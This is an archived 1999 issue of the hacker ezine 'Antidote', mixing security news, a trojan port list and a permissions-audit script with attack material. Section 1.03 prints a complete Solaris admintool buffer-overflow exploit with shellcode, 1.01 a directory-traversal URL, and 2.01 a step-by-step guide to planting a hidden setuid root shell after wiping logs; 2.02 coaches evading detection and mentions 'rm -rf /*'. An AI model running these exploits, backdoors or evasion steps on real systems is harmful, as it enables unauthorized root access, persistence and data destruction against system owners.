💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › ANTIDOTE › anti… captured on 2021-12-03 at 14:04:38.

View Raw

More Information

-=-=-=-=-=-=-

Volume 2 Issue 4
5/16/99

          **                                             **                     
       *****                         *       *            **                  * 
      *  ***                        **      ***           **                 **        
         ***                        **       *            **                 **                 
        *  **                     ********                **      ****     ********        
        *  **       ***  ****    ********  ***        *** **     * ***  * ********   ***    
       *    **       **** **** *    **      ***      *********  *   ****     **     * *** 
       *    **        **   ****     **       **     **   ****  **    **      **    *   ***  
      *      **       **    **      **       **     **    **   **    **      **   **    *** 
      *********       **    **      **       **     **    **   **    **      **   ********  
     *        **      **    **      **       **     **    **   **    **      **   ******* 
     *        **      **    **      **       **     **    **   **    **      **   **        
    *****      **     **    **      **       **     **    **    ******       **   ****    * 
   *   ****    ** *   ***   ***      **      *** *   *****       ****         **   *******  
  *     **      **     ***   ***              ***     ***                           *****   
  *                                                                      
   **                          http://www.thepoison.org/antidote

   ------------------------------

    Here is another issue of Antidote that has been released. Right now we have over 415
    subscribers and getting more and more subscribers everyday. We are very sorry to say
    that we are not going to be sending Antidote as a attchment anymore because we have
    gotton so many subscribers that our mail server is going ape shit when we send them (we
    don't have a mail server just for Antidote). What we are going to start to do is just
    e-mail everyone the URL as to where they can download the new issue of Antidote. So you
    will start recieving e-mails about ever week telling you that a new issue of Antidote
    has been released and where you can get it. Sorry if this is an inconvience to anyone,
    but it is such a hassle to send this as an attachment cause of the mail server. The last
    issue that we sent as an attchment took us over 2 and a half hours to send to all of the
    users because of problems and the mail server kept crashing because of it.
	
    At Antidote, we never ask anything from anyone except articles in wich is optional, but
    now, if you could please visit our sponsor because we have to pay for the domain
    (www.thepoison.org) and it is getting to be to expensive to keep it up, though we don't
    want to take it down. So please take 2 seconds out of your time and please go to the
    fallowing URL and click on our sponsor:

	http://www.thepoison.org/popup.html

    The reason why we don't link the sponsor directly from here is
    because they have a refferal page where you type in the URL of the page that will have
    the link on it and if the refferal does not come from that page, then the 'hit' does not
    count. So please go to that URL and click on our sponsor!


   --=\\Contents\\=--
	
	0.00 - Beginning
	  0.01 - What?
	  0.02 - FAQ
	  0.03 - Shouts
	  0.04 - Writing
	1.00 - News & Exploits
	  1.01 - Alibaba 2.0
	  1.02 - CIH has gone 'phoney'
	  1.03 - Admintool Overflow
	  1.04 - Corel Virus
	  1.05 - Check.pl
	  1.06 - SSHD Root
	2.00 - Misc
	  2.01 - Root : Anytime
	  2.02 - How Not to Get Caught
	  2.03 - Trojan Ports

   ------------------------------



<!-- 0.00 - Beginning //-->

0.01 --=\\What?\\=--

    What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
    that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
    basically current news and happenings in the underground world. We aren't going to teach
    you how to hack or anything, but we will supply you with the current information and
    exploits. Mainly Antidote is just a magazine for people to read if they have some extra
    time on there hands and are bored with nothing to do. If you want to read a magazine
    that teaches you how to hack etc, then you might want to go to your local bookstore and
    see if they carry '2600'.

   ------------------------------


0.02 --=\\FAQ\\=--

    Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
    Questions". Please read this before e-mailing us with questions and if the question
    isn't on here or doesn't make sense, then you can e-mail us with your question.

    > What exactly is "Antidote"?
      See section 0.01 for a complete description.	
	
    > I find Antidote to not be shot for the beginner or does not teach you the basics,
    why is that?
      Antidote is for everyone, all we are basically is a news ezine that comes out once
      a week with the current news, exploits, flaws and even programming. All of the
      articles that are in here are recieved second hand (sent to us) and we very rarely
      edit anyone's articles.

    > I just found Antidote issues on your webpage, is there anyway I can get them sent
    to me through e-mail?
      Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
      input your e-mail address. You will recieve Antidote the second we release it and the
      e-mail will contain a hyperlink to the URL in wich you can download the current issue.

    > If I want to submit something, are there any 'rules'?
      Please see section 0.03 for a complete description.
	
    > If I submitted something, can I remain anonymous?
      Yes. Just make sure that you specify what information about yourself you would like to
      be published above your article (when sending it to us) and we will do what you say.

    > I submitted something and I didn't see it in the current/last issue, why is that?
      It could be that someone else wrote something similar to what you wrote and they sent
      it to us first. If you sent us something and we didn't e-mail you back, then you might
      want to send it again because we probably didn't get it (we respond to all e-mails no
      matter what). We might use your article in future issues off Antidote.

    > Can I submit something that I didn't "discover" or "write"?
      Yes you can, we take information that is written by anyone regardless if you wrote it
      or not.

    Well thats it for our FAQ. If you have a question that is not on here or the question is
    on here and you had trouble understanding it, then please feel free to e-mail
    lordoak@thepoison.org and he will answer your question. This FAQ will probably be
    updated every month.

   ------------------------------


0.03 --=\\Shouts\\=--

    These are just some shout outs that we feel we owe to some people. Some are individuals
    and Some are groups in general. If you are not on this list and you feel that For some
    reason you should be, then please contact Lord Oak and he will post you on here and we
    are sorry for the Misunderstanding. Well, here are the shout outs:
     
                             Lord Oak           EazyMoney
                             Duece              Astral
                             Black Magick       oX1dation
                             Forlorn            Retribution
                             0dnek              www.thepoison.org
                             Serial Killer      Jaynus

    Like we said above, if we forgot you and/or you think you should be added, please e-mail
    lordoak@thepoison.org and he will be sure to add you.

   ------------------------------


0.04 --=\\Writing\\=--

    As many of you know, we are always open to articles/submittings. We will take almost
    anything that has to do with computer security. This leaves you open for:

	-Protecting the system (security/securing)
	-Attacking the system (hacking, exploits, flaws, etc....)
	-UNIX (really anything to do with it...)
	-News that has to do with any of the above....

    The only thing that we really don't take is webpage hacks, like e-mailing us and saying
    "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
    you have any questions about what is "acceptable" and not, please feel free to e-mail
    Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
    note that if we recieve two e-mails with the same topic/idea then we will use the one
    that we recieved first. So it might be a good idea to e-mail one of us and ask us if
    someone has written about/on this topic so that way you don't waste your time on writing
    something that won't be published. An example of this would be:

	If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
	thursday.
	And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
	take Joe's article because he sent it in first.

    But keep in mind, we might use your article for the next issue! If you have something
    that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
    duece@thepoison.org  and one of us will review the article and put it in Antidote (if we
    like it).

   ------------------------------


           _________________________________
          )                        ___      (
         (     //___/ / //   ) ) //   ) )    )
          )   /____  / //   / /   __ / /    ( 
         (        / / //   / /       ) )     )
          )      / / ((___/ /  ((___/ /     ( 
         (    http://www.403-security.org    )
          )  For the latest hacks and news  (
         (___________________________________)                                 



<!-- 1.00 - News & Exploits //-->

1.01 --=\\Alibaba 2.0\\=--

    I've found a security hole in the web server Alibaba 2.0 (the latest version). I haven't
    tried it on any other version. Here's an example: If you install it so the web root is
    located in c:\alibaba\HtmlDocs\ you can send an URL:

	http://www.server.se/../../winnt/file.txt

    and get the "file.txt" file. This works all over the disk Alibaba is installed on. If
    directory browsing isn't allowed you have to know the pathname of the file you want. If
    directory browsing is allowed you can start at the disk root directory, but you have to
    enter the directories by hand when browsing, because the server will assume they are
    located in the web root, so if you just click around all you'll get is lots of 404's.
    /Arne Vidstrom- comment for Russ to be removed when posting out on the list - I haven't
    contacted the vendor at all.

   ------------------------------


1.02 --=\\CIH has gone 'phoney'\\=--

    [www.cnn.com]

    A fast-traveling rumor that the Chernobyl virus that melted down at least 600,000
    computers worldwide last month would wreak havoc on cellular phones in Lebanon on
    Saturday tangled telephone lines and briefly shut down Lebanon's telephone network. 

    Lebanese flipped off their mobiles and picked up traditional telephones to warn friends
    and family to do the same. The panic in this cellular-loving country overloaded the
    network, disrupting service for a few minutes, Ad-Diyar daily newspaper reported Sunday. 

    Losses from the drop in cellular calls amounted to dlrs 30,000, the newspaper reported. 

    The Chernobyl virus, timed to strike computers on the April 26 anniversary of the
    Chernobyl nuclear disaster, tries to erase a computer's hard drive and write gibberish
    into system settings. 

    Parliament was considering an investigation into the source of the rumor, which
    Lebanon's two cellular companies scrambled in vain to debunk as technically implausible. 

    Reporters tried Saturday to reach the Lebanese communications minister about the scare,
    according to the London-based Al-Hayat newspaper. His two cellular phones, however, were
    shut off.

    http://www.cnn.com/WORLD/meast/9905/09/lebanon.cell.hoax.ap/
   ------------------------------

    
1.03 --=\\Admintool Overflow\\=--

    /*=============================================================================
       admintool Overflow Exploits( for Sparc Edition)
       The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
       Written by UNYUN (unewn4th@usa.net)
       [usage]
            % setenv DISPLAY yourdisplay  (ex. setenv DISPLAY 192.168.0.100:0.0)
            % gcc ex_admintool.c (This example program)
            % a.out
           ( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
             -> Directory: /tmp -> [Ok] )
            #

       In /tmp/EXP directory, the temp files are made, please remove it.
      =============================================================================
    */

    #include    <stdio.h>


    #define ADJUST1     2
    #define ADJUST2     1
    #define BUFSIZE1    1000
    #define BUFSIZE2    800
    #define OFFSET      3600
    #define OFFSET2     400

    #define PKGDIR      "mkdir /tmp/EXP"
    #define PKGINFO     "/tmp/EXP/pkginfo"
    #define PKGMAP      "/tmp/EXP/pkgmap"

    #define NOP         0xa61cc013

    char exploit_code[] =
    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
    "\x94\x10\x20\x10\x94\x22\xa0\x10"
    "\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08"
    ;

    unsigned long get_sp(void)
    {
    __asm__("mov %sp,%i0 \n");
    }

    unsigned long ret_adr;
    static char   x[500000];
    FILE    *fp;
    int     i;

    main()
    {
        system(PKGDIR);
    	putenv("LANG=");
        if ((fp=fopen(PKGMAP,"wb"))==NULL){
            printf("Can not write '%s'\n",PKGMAP);
            exit(1);
        }
        fclose(fp);

        if ((fp=fopen(PKGINFO,"wb"))==NULL){
            printf("Can not write '%s'\n",PKGINFO);
            exit(1);
        }
        fprintf(fp,"PKG=");

        ret_adr=get_sp()-OFFSET;
        while ((ret_adr & 0xff000000) == 0 ||
           (ret_adr & 0x00ff0000) == 0 ||
           (ret_adr & 0x0000ff00) == 0 ||
           (ret_adr & 0x000000ff) == 0)
               ret_adr += 4;

        printf("Jumping address = %lx\n",ret_adr);
        memset(x,'a',4);
        for (i = ADJUST1; i < 1000; i+=4){
            x[i+3]=ret_adr & 0xff;
            x[i+2]=(ret_adr >>8 ) &0xff;
            x[i+1]=(ret_adr >> 16 ) &0xff;
            x[i+0]=(ret_adr >> 24 ) &0xff;
        }
        x[BUFSIZE1]=0;
        fputs(x,fp);
        fprintf(fp,"\n");

        fprintf(fp,"NAME=");
        memset(x,'a',4);
        for (i = ADJUST2; i < BUFSIZE2; i+=4){
            x[i+3]=NOP & 0xff;
            x[i+2]=(NOP >> 8 ) &0xff;
            x[i+1]=(NOP >> 16 ) &0xff;
            x[i+0]=(NOP >> 24 ) &0xff;
        }
        for (i=0; i<strlen(exploit_code); i++)
            x[i+ADJUST2+OFFSET2]=exploit_code[i];
        x[BUFSIZE2]=0;
        fputs(x,fp);
        fprintf(fp,"\n");

        fprintf(fp,"VERSION=1.00\n");
        fprintf(fp,"ARCH=sparc\n");
        fprintf(fp,"CLASSES=none\n");
        fprintf(fp,"CATEGORY=application\n");
        fprintf(fp,"PSTAMP=990721\n");
        fprintf(fp,"BASEDIR=/\n");
        fclose(fp);
        system("admintool");
    }

   ------------------------------


1.04 --=\\Corel Virus\\=--

    [www.pcworld.com]

    A new wrinkle in computer viruses appeared this week with the discovery of a virus that
    infects the script language used by Corel products. But experts say the GaLaDRiel (or
    C.S.Gala) virus will affect few users, and is not destructive.

    The virus is not contained in the company's applications, according to a Corel
    representative. You can get it only by receiving an infected script file from another
    user via disk or download. When it triggers, all the virus does is display text.

    GaLaDRiel is "in the low-risk category," according to Sal Viveros, a spokesperson for
    Network Associates, maker of McAfee Antivirus. The virus is rare, doesn't spread easily,
    and causes minimal damage, Viveros says. 

    Although GaLaDRiel has the potential to infect other Corel Script files, it doesn't
    launch automatically. You have to run the infected script for it to spread. And the
    virus doesn't infect program files.

    After GaLaDRiel infects a Corel Script file, it will run its payload on June 6 only,
    displaying seven lines from J.R.R. Tolkien's The Lord of the Rings. As far as virus
    researchers have been able to ascertain, GaLaDRiel does nothing else.

    All major developers of antivirus software plan to add detection and removal of
    GaLaDRiel to their latest virus updates within the next two weeks.

    How to Check for the Virus


    Corel recommends taking the following steps to see if your scripts have been infected
    and to remove the virus if they have been:

      1. Using Windows Explorer, browse the directory that contains the potentially infected
         scripts.

      2. Right-click on a Corel script.csc file and select Open.

      3. When the Corel Script Editor opens, examine the first line of the script. If the
         text begins with REM ViRUS GaLaDRiel, then your script is infected.

      4. To cure the infection, delete all the script lines from REM ViRUS GaLaDRiel to REM
         END OF ViRUS.

      5. Resave your Corel Script file with the same name, overwriting the infected version.

      6. Repeat the above steps for all .csc files in the same directory. (This final step
         is important, because running any infected Corel Script file will infect all other
         .csc files in the same directory.)

    http://www.pcworld.com/pcwtoday/article/0,1510,10954,00.html
   ------------------------------



1.05 --=\\Check.pl\\=--

    #!/usr/bin/perl -w
    # 
    # Check.pl
    # Written by David Allen
    # s2mdalle@titan.vcu.edu
    # http://opop.nols.com/
    #
    # Released under the terms of the GNU GPL
    #
    # Run the program with an argument of the directory you want to completely scan
    # Usage:
    # check.pl / 
    # 
    # Currently this program DOES NOT follow symlinks because of some program's
    # tendencies to have circular symlinks which will run you out of memory 
    # pretty fast.  And that's evil.  Maybe I'll make it check for circular 
    # symlinks later, but right now, that's a real pain in the ass.
    #
    # This program reports SUID, SGID, STICKY, writeable files by
    # the effective user.  This is best run with the permissions of a regular
    # user who shouldn't be editing a lot of your files.  :)
    # 
    # It prints everything to STDOUT by default.  Redirect the output wherever
    # the hell you want it.

    use strict;  # Keep me honest

    my $root = shift;
    my $BEGINNING_LEVEL=0;

    if(not $root)
    {
    # Initialize if the user didn't give us anything to cling to.
    $root="/";
    }

    # Level indexing is provided for debugging and to check if it's going out
    # of control.  In dirinfo() you can adjust what the warning and error levels
    # are for the number of directory levels deep this will check.
    print "Calling dirinfo\n";
    dirinfo($root, $BEGINNING_LEVEL);

    sub dirinfo
    {
        my $dirname = shift;
        my $level = shift;
        my $HANDLE;
        my $MAXLEVEL=100;
        my $WARNINGLEVEL=50;

        if($level==$WARNINGLEVEL)
        {
	print STDERR "WARNING:  Deep directory structure.  I hope you have some serious RAM free...\n";
        }
        if($level>$MAXLEVEL)
        {
	    print STDERR "ERROR:  Max recursion met - directory structure deeper than $MAXLEVEL directories.  That's bad.  You can change the default in the script, or you can see if you can find any circular symlinks that are causing the problem.  Check the end of your output for clues.\n\n";
	    die "ERROR:  Max-eval-depth error.\n";
        }

        opendir HANDLE, "$dirname" or return(-1);

        my @allfiles = readdir HANDLE;
    
    #    print  "Reading info on \"$dirname\"...\n";

    TORTURE: foreach my $file (@allfiles)
    {
	my $foobar;
	
	if($dirname eq "/")
	{
	    $foobar = $dirname . $file;
	}
	else
	{
	    $foobar = $dirname. "/". $file;
	}
	
	# print "\"$foobar\" level $level\n";
	if(($file eq ".") or ($file eq ".."))
	{
	    # Go on your merry way...ignore this one.
	}

	# If the file is writeable, and doesn't belong to the user running
	# this script, then it gets reported.
	elsif((-W $foobar) and (not (-O $foobar)))  # File is writeable&&!owned
	{
	    # If it's a directory, report it as such.
	    if(-d $foobar)  # File is a directory
	    {
		print "\"$foobar\" ### WRITEABLE DIR\n"
	    }
	    else
	    {
		my $fileinfo=`ls -l "$foobar"`;
		chomp($fileinfo);
		print "\"$fileinfo\" ### WRITEABLE\n";
	    } # End else 
	} # End elsif
	elsif(-l $foobar)
	{
	    # my $fileinfo=`ls -l "$foobar"`;
	    # chomp($fileinfo);
	    # print "\"$fileinfo\" ### SYMLINK\n";
	    # Symlink evilness.  Especially with GNOME.  :(
	}
	elsif(-d $foobar)  # File is a directory
	{
	    # File is a directory - recurse through it
    #	    DEBUG: print "Entering \"$file\" coming from \"$dirname\"\n";
	    my $tmp=dirinfo($foobar, ($level+1));
	    if($tmp == -1)
	    {
		print "Directory $foobar not readable with your sorry UID.\n";
	    }
	}
	elsif(-u $foobar)   # File is SUID
	{
	    my $fileinfo=`ls -l "$foobar"`;
	    chomp($fileinfo);
	    print "$fileinfo ### SUID\n";
	}
	elsif(-g $foobar)  # File is SGID
	{
	    my $fileinfo=`ls -l "$foobar"`;
	    chomp($fileinfo);
	    print "$fileinfo ### SGID\n";
	}
	elsif(-k $foobar)  # File is sticky
	{
	    my $fileinfo=`ls -l "$foobar"`;
	    chomp($fileinfo);
	    print "$fileinfo ### STICKY\n";
	}
	else
	{
    #	    DEBUG2: print "\"$foobar\" doesn't look very interesting to me.\n";
	}
    } # End foreach
    } # End dirinfo

   ------------------------------


1.06 --=\\SSHD Root\\=--

    When was the last time you rebuilt all privileged (`suid root') applications when
    upgrading a unix system, just in case?

    I'm pretty sure one can find `small print' that demands this, however I'm equally sure
    that hardly any system manager does so, since problems seem to occur _very_ rarely.
    Here's a neat one:

    Some time prior to the upgrade, system manager (S.M.) was asked to install `sshd' on a
    not-so-common platform (nothing really security-relevant, machine used for raw speed
    only, users just being accustomed to that sort of login). Said platform (featuring a
    particularly elaborate user data base) requires some special calls (simple calling
    sequences) to be done during `login' - no problem, `sshd' knows about them, although not
    explicitly aware of the particular hardware. Cautiously, S.M. configures `sshd' to not
    allow `root' logins from the outside.  What other harm could it possibly do?

    Upgrade has to occur somewhat in a hurry, release documentation isn't on-site, but
    procedures are known well enough. S.M. asks the manufacturer's support representative if
    special precautions have to be taken, "errr, not that I'd think so". S.M. installs new
    version, all fine & dandy, even remembers to check out `sshd' afterwards and finds it to
    work the same as before.

    A couple of days later, S.M. logs in via `sshd' himself, and for the first time enters
    `su'. Gets very amazed at the new system's intelligence, as it knows to not ask him for
    a password. Minutes later, S.M. recognizes that `su' would never ask for a password,
    when the parent process had been created via `sshd' ... in spite of no other visible
    peculiarities with that process.

    A re-build (pretty likely boiling down to nothing but a re-link) of `sshd' fixed the
    problem.

    Quite a few years ago, when I saw the first mention of `ssh', I commented  "If you're a
    bank, you don't buy your safe at a flea market;  if you're not, you might be better off
    without a safe".  Maybe there's _some_ truth in it, after all.

    Imagine uSoft going open source, and no-one going to have a look at it...

   ------------------------------

    
          10001010100101110101010101001011101010101000
          0                                          1
          1   Y88b Y88 888 888 888 88e     e88'Y88   0
          1    Y88b Y8 888 888 888 888b   d888  'Y   1
          0   b Y88b Y 8888888 888 8888D C8888       1
          0   8b Y88b  888 888 888 888P   Y888  ,d   1
          1   88b Y88b 888 888 888 88"     "88,d88   0
          1                                          1
          1        http://www.nudehackers.com        0
          0                                          0
          01001010110101010001011010010111010100101011



<!-- 2.00 - Misc //-->

2.01 --=\\Root : Anytime\\=--

    After gaining root access to a server you always risk the chance of losing access.  The
    admin may change the password or fix the hole allowing a root shell.  Well now you have
    a way to keep that root shell.  The admin can change the password or fix the security
    hole.  As long as you have local access, you have root access. Down to the nitty gritty.
    In the /bin dir there is file named sh.  This is the actual shell.  By running this the
    user will have shell access to the user that owns it.  

      Once you have root on the computer, after you fix the logs and the .bash_history, go
    to the /bin dir and copy sh to a dir with permissions of 777 (or that you have access
    to.). After you have finished go back and change permissions on the dir to 700 so no one
    else can access this without knowing the file name and where it is. If you have an
    account the box simply create a dir inside your home dir where you can hide it.  If you
    don't have access then you can copy it to the /tmp dir or even make a different and hide
    it. To hide the dir instead of a name such as HERE, use .HERE. The period in front will
    hide it from ls(using ls -a will show it).  Now once you have sh in that dir chmod it to
    4777 this will modify the setuid bit, allowing it to set the userid of the person who
    ran the file, to userid of the owner of the file, in this case root.  Now time to hide
    this file. In case you dir is found or viewed hide the file.  Again instead of leaving
    the name sh name it .sh, or even go father and name it something other than sh so its
    not as noticalbe. Now you have a ROOT SHELL any time.  This also works with users other
    than root.

    Heres a lil example:
    [root@hacked box]$ mkdir /home/forlorn/.here
    [root@hacked box]$ chmod 777 /home/forlorn/.here
    [root@hacked box]$ copy /bin/sh /home/forlorn/.here
    [root@hacked box]$ cd /home/forlorn/.here
    [root@hacked box]$ chmod 4777 sh
    [root@hacked box]$ mv sh .jk
    [root@hacked box]$ su forlorn
    password:
    [forlorn@hacked box]$ cd .here
    ./.jk
    bash# whoami
    root

    heh :)
    rootshell anytime

    Forlorn
    forlorn@Nudehackers.com
   ------------------------------


2.02 --=\\How Not to Get Caught\\=--

    Lots have said it. "I am scared to hack because I might get cought and go to jail!!!",
    etc, etc, etc.  You've all seen it before. There are plenty of ways to be catious. And
    not to get cought(or get on the publics and medias good side if you do).  When hacking
    any type of *nix system, always check /etc/syslog.conf and check to make sure all the
    logs were takin care off. A good Sys Admin will log in more places then in /var/log/.
    Ya know?  Among other things, DONT EVER DELETE OR MODIFY UNNESSISARY FILES. EVER. of
    course, unless the admin has completly made of fool of you, then feel free to do a
    rm -rf /* if you like. =P  If you are patient, you could always commence your hack of a
    machine/network over a period of time to lower suspision.  Lots of logs in 1 night of
    you attacking would be noticed easier by a  admin/log-checker then one over a period of
    2 weeks or soo. Attacking patiently will reduce the chances of you being noticed while
    tryin to gain access. This is a mistake many new skool hackers have made. Braggin bout
    your hacks. Posting on 500 usenets and bbs's saying "Y0 F00LZ I H4K0R3D FBI.GOV" will
    get you busted real fast, if you catch my drift. Keep your major hacks to yourself
    and/or you group. You should have pride in your hacks, and knowing that no one else
    knows you are there is a great feeling that you know you have truely gained access to a
    computer as a ghost.
    Of course, you could just be having a bad day, and you just forget to clean one little
    thing out and the admin notices. First off, the action takin to a hacker is greatly
    exhagereated. A admin of a machine in the middle of bumfuck ohio mailin your ISP about a
    hack wont do much to ya. Most ISPs, when told about criminal activity just cancel your
    account, and thats it. Unless it is federal, international, or had something to do with
    banks or large corps. Lets just say, you wont go to jail for hacking anything worth
    under $50k. =) heh. Now, if it is big, and you get cought hacking, say, looking at
    planes for the new F-22 stealth fighter curcitry plans, you will go to court swiftly.
    This is when your not deleting or modifying comes in handy. The media will glorify you
    as a victim if you just simply say, "I was reading some very interesting information
    about the unclassified planes". They will give you the publics love, and that is good!
    heh. out of all my experience, the above are the most importent things I have learned to
    do and abide by. Remmember, more then 100X's the new skool(malicious) hackers are caught
    then us oldskool hackers!

    Jaynus
    http://Security.Jaynus.Com
   ------------------------------


2.03 --=\\Trojan Ports\\=--

    After seeing several questions about traffic directed at ports as 31337 and 12345 I've
    put together a list of all trojans known to me and the default ports they are using. Of
    course several of them could use any port, but I hope this list will maybe give you a
    clue of what might be going on.

	port     21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
	port     23 - Tiny Telnet Server
	port     25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth,
	              Terminator, WinPC, WinSpy
	port     31 - Hackers Paradise
	port     80 - Executor
	port    456 - Hackers Paradise
	port    555 - Ini-Killer, Phase Zero, Stealth Spy
	port    666 - Satanz Backdoor
	port   1001 - Silencer, WebEx
	port   1011 - Doly Trojan
	port   1170 - Psyber Stream Server, Voice
	port   1234 - Ultors Trojan
	port   1245 - VooDoo Doll
	port   1492 - FTP99CMP
	port   1600 - Shivka-Burka
	port   1807 - SpySender
	port   1981 - Shockrave
	port   1999 - BackDoor
	port   2001 - Trojan Cow
	port   2023 - Ripper
	port   2115 - Bugs
	port   2140 - Deep Throat, The Invasor
	port   2801 - Phineas Phucker
	port   3024 - WinCrash
	port   3129 - Masters Paradise
	port   3150 - Deep Throat, The Invasor
	port   3700 - Portal of Doom
	port   4092 - WinCrash
	port   4590 - ICQTrojan
	port   5000 - Sockets de Troie
	port   5001 - Sockets de Troie
	port   5321 - Firehotcker
	port   5400 - Blade Runner
	port   5401 - Blade Runner
	port   5402 - Blade Runner
	port   5569 - Robo-Hack
	port   5742 - WinCrash
	port   6670 - DeepThroat
	port   6771 - DeepThroat
	port   6969 - GateCrasher, Priority
	port   7000 - Remote Grab
	port   7300 - NetMonitor
	port   7301 - NetMonitor
	port   7306 - NetMonitor
	port   7307 - NetMonitor
	port   7308 - NetMonitor
	port   7789 - ICKiller
	port   9872 - Portal of Doom
	port   9873 - Portal of Doom
	port   9874 - Portal of Doom
	port   9875 - Portal of Doom
	port   9989 - iNi-Killer
	port  10067 - Portal of Doom
	port  10167 - Portal of Doom
	port  11000 - Senna Spy
	port  11223 - Progenic trojan
	port  12223 - Hack�99 KeyLogger
	port  12345 - GabanBus, NetBus
	port  12346 - GabanBus, NetBus
	port  12361 - Whack-a-mole
	port  12362 - Whack-a-mole
	port  16969 - Priority
	port  20001 - Millennium
	port  20034 - NetBus 2 Pro
	port  21544 - GirlFriend
	port  22222 - Prosiak
	port  23456 - Evil FTP, Ugly FTP
	port  26274 - Delta
	port  31337 - Back Orifice
	port  31338 - Back Orifice, DeepBO
	port  31339 - NetSpy DK
	port  31666 - BOWhack
	port  33333 - Prosiak
	port  34324 - BigGluck, TN
	port  40412 - The Spy
	port  40421 - Masters Paradise
	port  40422 - Masters Paradise
	port  40423 - Masters Paradise
	port  40426 - Masters Paradise
	port  47262 - Delta
	port  50505 - Sockets de Troie
	port  50766 - Fore
	port  53001 - Remote Windows Shutdown
	port  61466 - Telecommando
	port  65000 - Devil

    You'll find the list on the following address: http://www.simovits.com/nyheter9902.html
    (still in Swedish but it will be translated in the near future).

    To help anyone to detect trojan attacks, I�m planning to add information about the
    original names of the executables, their size, where they usually are hiding, and the
    names of any helpfiles they may use. I will also add tools or links to tools that may be
    of your assistance.

    Feel free to get back to me with any comments or suggestions. If you find new trojans
    I�ll love to get my hands on them, but please mail me first, as I don�t need more than
    one copy. If you have live experiance of trojan attacks I�m interested to read about
    your findings.

    Joakim
    joakim.von.braun@risab.se
   ------------------------------



    Please visit:
    http://www.thepoison.org/popup.html  and click on our sponsor(s) please!
    Please go there and just take 2 seconds to click there because we have to pay the bills
    somehow.

           		_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
           		_|				      _|
	   		_|  _|    _|  _|      _|  _|      _|  _|
	   		_|  _|    _|  _|_|    _|  _|_|    _|  _|
	   		_|  _|_|_|_|  _|  _|  _|  _|  _|  _|  _|
	   		_|  _|    _|  _|    _|_|  _|    _|_|  _|
	   		_|  _|    _|  _|      _|  _|      _|  _|
           		_|    Antidote is an HNN Affiliate    _|
           		_|     http://www.hackernews.com      _|
	   		_|				      _|
           		_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|


	All ASCII art is done by Lord Oak and permission is needed from him before using.